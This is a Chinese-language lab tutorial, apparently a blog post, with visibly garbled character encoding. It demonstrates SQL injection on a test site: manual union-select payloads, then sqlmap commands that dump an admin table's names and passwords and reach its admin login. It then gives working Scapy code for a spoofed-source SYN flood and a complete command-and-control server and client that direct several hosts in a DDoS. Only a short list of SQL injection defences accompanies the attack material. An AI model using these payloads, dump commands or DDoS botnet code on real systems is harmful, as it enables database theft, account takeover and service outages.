经过对SQL注入的演示,让你们了解SQL注入漏洞的方式,并学习应对此种漏洞的防护方法。php
操做机IP地址:172.16.11.2html
一、第一步,判断注入点字符仍是数字
字符型
' and 'a'=a'
' and 'a'='bpython
数字型
and 1=1
and 1=2
二、判断列数,使用order by n(n为数字)
(1) order by 14报错,说明列数少于14
(2) order by 10没报错,说明列数>=10
(3) 13不报错,14错,说明列数13个。
也就是后台语句
select from table where id = 2
这里的的列数有13列,而union的做用是联合,也就在原来id=2的数据上,再加上咱们想要的数据,这里union all select的列数必须和前面的同样,也就是13
三、假如第二步n为10,union select 1,2,3,4,5,6,7,8,9,10
(1) n为13,因此union select 1,.......13
(2)为何要将2变成-2,是由于想让原来的select,也就是(select * from table where id = 2 )的结果为空,只留下咱们的union select 1,......13(...为省略)
(3)若是不变成-2,看一下结果---》咱们的数据没有出来,因此为了出数据,要将id变成负的
(4)这里使用1到13的数字,要是那个数字在页面显示或者出现,就表明那个列能够获取数据。这里,是6和7
四、sqlmap的payload,如今能够看一下
id=-1285 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7158766471,0x44534b46536d76474b4e,
0x7174676d71),NULL,NULL,NULL,NULL,NULL,NULL#
你数数concat是第几列,第7个。而后select后面的数据一共是多少列,13个。和咱们本身分析的同样,因为第6和第7是出数据的列,因此只要哪里写上咱们想要的数据就好mysql
首先打开目标站点www.test.com找注入点,打开文章中心随便点一篇文章,页面地址为http://www.test.com/Art_Show.php?id=2,首先在id=2后面加一个单引号来判断这是不是一个注入点,返回了一个错误提示更新点击数出现错误!。
能够看见url里有一个id=2,能够根据这个判断他是由get请求进行提交的,由于经过get请求提交的,提交的数据会在url里进行体现,而这个也是咱们能够利用的地方。
如今替换一个注入查询语句换成 and 1=1,页面并无出现变化,再换成 and 1=2。
这里出现了一个错误提示,更新点击数出现错误,这样说明咱们输入的and 1=1 和and 1=2在数据库内执行了,由于and 1=1这条查询语句就永为真,它就会继续执行,and 1=2 这条语句就为假,查询语句没法继续执行,就会返回错误,这样咱们就能够初步判断这个url地址是一个注入点。web
将注入点放到sqlmap里进行进一步的判断。Python sqlmap.py –u "http://www.test.com/Art_Show.php?id=2"
返回信息提示这是一个注入点而且返回对方系统的信息,系统是windows,Web容器是apache2.4.9版本,语言php5.2.17版本,目标数据库是mysql5.0.11版本。sql
Python sqlmap.py –u "http://www.test.com/Art_Show.php?id=2" --dbs
使用如下命令进行注入测试,获取数据库内全部数据库的名称,返回信息目标数据库内有五个数据库:mys mysql test information_schema performance_schema
使用如下命令查看
Python sqlmap.py –u "http://www.test.com/Art_Show.php?id=2" --current–db
网站所依赖的数据库的名称,返回信息依赖的数据库为mys 数据库
使用如下命令
Python sqlmap.py –u "http://www.test.com/Art_Show.php?id=2" -D mys --tables
获取mys数据库内表信息。
mys数据库下一共有十四个表,使用命令获取: Python sqlmap.py –u "http://www.test.com/Art_Show.php?id=2" -D mys -T zzcms_admin --columns
zzcms_admin表内列的信息。
使用如下命令:
Python sqlmap.py –u "http://www.test.com/Art_Show.php?id=2" -D mys -T zzcms_admin –C name,password --dump
对这name和password两个列进行查询并获取KEY。
获取帐号和密码。apache
使用wvs工具扫出web后台管理
http://www.test.com/AdminLogin.php使用帐号admin密码登陆编程
1.普通用户与系统管理员的权限要有严格的区分 分为administrator和普通用户,权限读写执行分开。 2.强迫使用参数化语句 一般状况下咱们的SQL语句多是这样: select * from UserInfo where sex=0 在参数化SQL语句中咱们将数值以参数化的形式提供,对于上面的查询,咱们用参数化SQL语句表示为: select * from UserInfo where sex=@sex 3.增强对用户输入的验证 user() 返回你链接server时候指定的用户和主机 current_user() 返回在mysql.user表中匹配到的用户和主机,这将肯定你在数据库中的权限 4.多使用数据库自带的安全参数 1.将#skip-networking注释去掉。 2.max_user_connections 限制链接数。 3.用户目录权限限制。 5.使用专业的漏洞扫描工具来寻找可能被***的点 Wvs等工具
验证: http://www.test.com/Art_Show.php?Id=2 Payload:Id=2 AND 2039=2039 Payload:id=-1285 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7158766471,0x44534b46536d76474b4e, 0x7174676d71),NULL,NULL,NULL,NULL,NULL,NULL#
本次实验将使用python3版本的Scapy--Scapy3k来实现一个简单的Dos。windows
SYN***利用的是TCP的三次握手机制,***端利用伪造的IP地址向被***端发出请求,而被***端发出的响应 报文将永远发送不到目的地,那么被***端在等待关闭这个链接的过程当中消耗了资源,若是有成千上万的这种链接,主机资源将被耗尽,从而达到***的目的。
SYN泛洪***(SYN Flood)是一种比较经常使用的DoS方式之一。经过发送大量伪造的Tcp链接请求,使被***主机资源耗尽(一般是CPU满负荷或者内存不足) 的***方式。
咱们都知道创建Tcp链接须要完成三次握手。正常状况下客户端首先向服务端发送SYN报文,随后服务端回以SYN+ACK报文到达客户端,最后客户端向服务端发送ACK报文完成三次握手。
而SYN泛洪***则是客户端向服务器发送SYN报文以后就再也不响应服务器回应的报文。因为服务器在处理TCP请求时,会在协议栈留一块缓冲区来存储握手的过程,固然若是超过必定的时间内没有接收到客户端的报文,本次链接在协议栈中存储的数据将会被丢弃。***者若是利用这段时间发送大量的链接请求,所有挂起在半链接状态。这样将不断消耗服务器资源,直到拒绝服务。
Scapy3k其实就是Scapy的Python3版本,如下我就简称Scapy。Scapy是一个强大的交互式数据包处理程序。可用来发送、嗅探、解析和伪造网络数据包。在网络***和***测试中应用很是普遍。Scapy是一个独立的程序同时还能够做为Python的第三方库使用。
sudo pip3 install scapy-python3
如今运行scapy。
sudo scapy
这里须要注意:Scapy发送数据包须要root权限,因此这里咱们加上了sudo。另外运行的时候会出现一些警告信息,咱们此次实验没有用到相关的功能能够不用管,须要用的安装相应的依赖包就能够了。
IP(src="202.121.0.12",dst="192.168.0.100")/TCP(dport=80,flags="S")
咱们构造了一个IP包和TCP包并将它们组合到一块,这样就有了一个完整的TCP数据包,不然是没法发送出去的。IP包中咱们指定了源地址src和目的地址dst,其中src是咱们伪造的地址,固然这也是DoS***中保护***者的一种方式。flags的值咱们设定为S,说明咱们要发送的是SYN数据包。很是简短的一段指令就够造了一个伪造了源IP地址的SYN数据包。
Send(pkt)
import random #引入random和scapy模块 from scapy.all import * def synFlood(tgt,dPort): #定义一个函数,传递2个参数, srcList = ['201.1.1.2','10.1.1.102','69.1.1.2','125.130.5.199'] for sPort in range(1024,65535): #定义了一个循环,做用是每次发送数据包源端口都改变 # 能够看到在构造TCP数据包的时候增长了一个参数sport # 循环中改变的端口号就是给了sport这个参数。调用random.randrange()函数来随机从srcList中获取一个伪造的IP地址。 index = random.randrange(4) ipLayer = IP(src=srcList[index], dst=tgt) tcpLayer = TCP(sport=sPort, dport=dPort,flags="S") packet = ipLayer / tcpLayer send(packet)
已经实现了SYN泛洪***,而DDoS则是多台主机一块儿发起***,咱们只须要能发送命令,让链接到服务器的客户端一块儿向同一目标发起***就能够了。
arse模块 因为Server端须要发送命令去控制Client端发起***,因此这里咱们先规定好命令格式: '#-H xxx.xxx.xxx.xxx -p xxxx -c <start|stop>'-H后面是被***主机的IP地址,-p指定被***的端口号,-c控制***的开始与中止。命令制定好了。 #导入argparse库 import argparse #建立ArgumentParser对象 parser = argparse.ArgumentParser(description='Process some integers.') #添加参数 parser.add_argument('-p', dest='port', type=int,help='An port number!') #解析命令行参数 args = parser.parse_args() print('Port:',args.port) 解释: 咱们建立了一个ArgumentParser对象,description参数是对命令行解析的一个描述信息,一般在咱们使用-h命令的时候显示。add_argument添加咱们要解析的参数,这里咱们只添加了一个-p参数,dest是经过parse_args()函数返回的对象中一个属性的名称。type你们应该很好理解,就是解析参数的类型。help指定的字符串是为了自动生成帮助信息。argparse默认就支持-h参数,只要咱们在添加参数的时候指定了help的值就能够生成帮助信息了。 Python中的socket提供了访问BSDsocket的接口,能够很是方便的实现网络中的信息交换。一般咱们使用socket的时候须要指定ip地址、端口号以及协议类型。在进行socket编程以前咱们先了解一下客户端(Client)和服务器(Server)的概念。通俗的讲主动发起链接请求的称为客户端,监听端口响应链接的咱们称为服务器。 因为Server端能等待Client主动链接,因此咱们在Server端发送命令,控制Client端发起SYN泛洪***。
import socket import argparse from threading import Thread socketList = [] #命令格式'#-H xxx.xxx.xxx.xxx -p xxxx -c <start|stop>' #发送命令 def sendCmd(cmd): print('Send command......') for sock in socketList: sock.send(cmd.encode('utf-8')) #等待链接 #新链接的socket要判断一下是否在socketList中已经存储过了,若是没有的话就添加到socketList中。 def waitConnect(s): while True: sock,addr = s.accept() if sock not in socketList: socketList.append(sock) def main(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(('0.0.0.0', 58868)) s.listen(1024) t = Thread(target=waitConnect,args=(s,)) t.start() #在主函数中咱们建立socket, 绑定全部网络地址和58868端口并开始监听,以后咱们新开一个线程来等待客户端的链接,以避免阻塞咱们输入命令。 print('Wait at least a client connection!') while not len(socketList): #在主函数中咱们第一次输入命令以前须要至少有一个客户端链接到服务器,因此这里咱们判断了一下socket的长度。 pass print('It has been a client connection!') #如今循环等待输入命令,输入以后判断命令是否知足命令格式的基本要求,若是知足了,就把命令发送给全部客户端。 while True: print('=' * 50) print('The command format:"#-H xxx.xxx.xxx.xxx -p xxxx -c <start>"') #等待输入命令 cmd_str = input('Please input cmd:') if len(cmd_str): if cmd_str[0] == '#': sendCmd(cmd_str) if __name__ == '__main__': main()
import sys import socket import random import argparse from multiprocessing import Process from scapy.all import * import os isWorking = False curProcess = None def synFlood(tgt,dPort): #定义一个函数,传递2个参数, srcList = ['201.1.1.2','10.1.1.102','69.1.1.2','125.130.5.199'] for sPort in range(1024,65535): #定义了一个循环,做用是每次发送数据包源端口都改变 # 能够看到在构造TCP数据包的时候增长了一个参数sport # 循环中改变的端口号就是给了sport这个参数。调用random.randrange()函数来随机从srcList中获取一个伪造的IP地址。 index = random.randrange(4) ipLayer = IP(src=srcList[index], dst=tgt) tcpLayer = TCP(sport=sPort, dport=dPort,flags="S") packet = ipLayer / tcpLayer send(packet) #命令格式'#-H xxx.xxx.xxx.xxx -p xxxx -c <start>' #处理命令 def cmdHandle(sock,parser): global curProcess while True: #接收命令 data = sock.recv(1024).decode('utf-8') if len(data) == 0: print('The data is empty') return if data[0] == '#': try: #解析命令 options = parser.parse_args(data[1:].split()) m_host = options.host m_port = options.port m_cmd = options.cmd #DDoS启动命令 if m_cmd.lower() == 'start': if curProcess != None and curProcess.is_alive(): curProcess.terminate() curProcess = None os.system('clear') print('The synFlood is start') p = Process(target=synFlood,args=(m_host,m_port)) p.start() curProcess = p #DDoS中止命令 elif m_cmd.lower() =='stop': if curProcess.is_alive(): curProcess.terminate() os.system('clear') except: print('Failed to perform the command!') def main(): #添加须要解析的命令 p = argparse.ArgumentParser() p.add_argument('-H', dest='host', type=str) p.add_argument('-p', dest='port', type=int) p.add_argument('-c', dest='cmd', type=str) print("*" * 40) try: #建立socket对象 s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) #链接到服务器端 s.connect(('127.0.0.1',58868)) print('To connected server was success!') print("=" * 40) #处理命令 cmdHandle(s,p) except: print('The network connected failed!') print('Please restart the script!') sys.exit(0) if __name__ == '__main__': main()
python3 ddoscli.py 客户端
python3 ddo***v.py 服务端
记住这里必定要用root权限来运行:先运行服务端再运行客户端。
咱们输入一个命令测试一下,为了维护绿色的网络环境,最好找个容许测试的站点:
#-H x.x.x.x -p 80 -c start
Client端已经开始发送数据包了,说明已经发起了SYN泛洪***。
参考文档:
Sql注入:
http://www.freebuf.com/articles/web/34619.html
http://www.freebuf.com/articles/web/38315.html
DOS***和防护:
http://www.cnblogs.com/grefr/p/6094975.html
http://blog.csdn.net/jiangzhengdong/article/details/8119223
https://security.tencent.com/index.php/blog/msg/81